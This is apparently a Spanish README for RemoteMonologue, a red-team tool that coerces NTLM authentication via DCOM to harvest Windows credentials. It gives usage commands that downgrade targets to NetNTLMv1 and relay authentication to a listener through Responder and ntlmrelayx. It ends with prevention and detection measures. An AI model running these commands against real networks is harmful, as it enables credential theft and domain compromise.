
Armando DCOM para coerciones de autenticación NTLM
RemoteMonologue es una técnica de recolección de credenciales de Windows que permite comprometer usuarios de forma remota aprovechando la clave RunAs de usuario interactivo y forzando autenticaciones NTLM mediante DCOM.
Lea el artículo RemoteMonologue: Armando DCOM para Coerciones de Autenticación NTLM de X-Force Red para obtener información detallada.
🔹 Coerción de Autenticación mediante DCOM (-dcom)
ServerDataCollectorSet, FileSystemImage, MSTSWebProxy, UpdateSession) para provocar una autenticación NTLM contra un listener especificado (-auth-to).🔹 Pulverización de Credenciales (-spray)
🔹 Ataque de Degradación a NetNTLMv1 (-downgrade)
🔹 Abuso del Servicio WebClient (-webclient)
🔹 Enumeración de Usuarios (-query)
Nota: Se requieren privilegios de administrador local en el sistema objetivo.
pip install impacket
A continuación se muestra un ejemplo de ejecución de RemoteMonologue con el ataque de degradación a NetNTLMv1 utilizando Responder como listener. De forma predeterminada, si no se especifica una opción DCOM, la herramienta usa el objeto DCOM ServerDataCollectorSet.
RemoteMonologue.py domain/user:password@target -auth-to [listener IP] -downgrade

A continuación se muestra otro ejemplo, esta vez el ataque se ejecuta utilizando el objeto DCOM FileSystemImage y habilitando el servicio WebClient para obtener una autenticación HTTP, que luego se retransmite a LDAP mediante ntlmrelayx.
RemoteMonologue.py domain/user:password@target -auth-to [listener NETBIOS@PORT] -webclient -dcom FileSystemImage

Para proteger contra estas técnicas y detectarlas, se pueden implementar varias medidas de prevención y detección.
Medidas preventivas:
Habilitar la Firma LDAP y el Enlace de Canales: Configure el cumplimiento de la firma LDAP y el enlace de canales en los controladores de dominio para proteger el extremo LDAP de ataques de retransmisión. Nota: Esta configuración se aplicará de forma predeterminada a partir de Windows Server 2025.
Actualizar a las Últimas Versiones de Windows: Actualice los servidores a Windows Server 2025 y las estaciones de trabajo a Windows 11 versión 24H2 para mitigar los ataques de degradación a NetNTLM, dado que NTLMv1 se ha eliminado en estas versiones.
Aplicar la Firma SMB: Habilite y aplique la firma SMB en los servidores Windows para prevenir ataques de retransmisión SMB.
Implementar Políticas de Contraseñas Seguras: Aplique requisitos de contraseñas seguras para que los ataques de descifrado de contraseñas sean más difíciles.
Oportunidades de detección:
Monitorear el Acceso Remoto a Objetos DCOM: Realice un seguimiento del acceso a los objetos DCOM afectados y a sus Propiedades y Métodos específicos para identificar actividad inusual.
Monitorear las Modificaciones del Registro: Supervise los cambios en las claves de registro RunAs y LmCompatibilityLevel.
Rastrear la Actividad del Servicio WebClient: Esté atento a los casos en los que el servicio WebClient se habilita de forma remota, ya que esto se utiliza para facilitar las autenticaciones NTLM basadas en HTTP.